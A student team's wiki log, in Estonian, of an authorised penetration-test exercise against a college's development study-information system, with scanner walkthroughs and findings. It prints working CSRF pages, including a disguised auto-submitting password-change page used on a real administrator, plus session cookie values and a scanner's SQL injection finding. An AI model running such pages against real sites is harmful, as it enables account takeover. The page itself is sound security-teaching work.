=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filme&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploaditud&lt;br /&gt;
Sellises kohas võiks olla süsteem tehtud whitelisti põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
Näiteks sellised failid ja kõik ülejäänud oleksid keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47029</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47029"/>
		<updated>2012-03-30T11:30:55Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
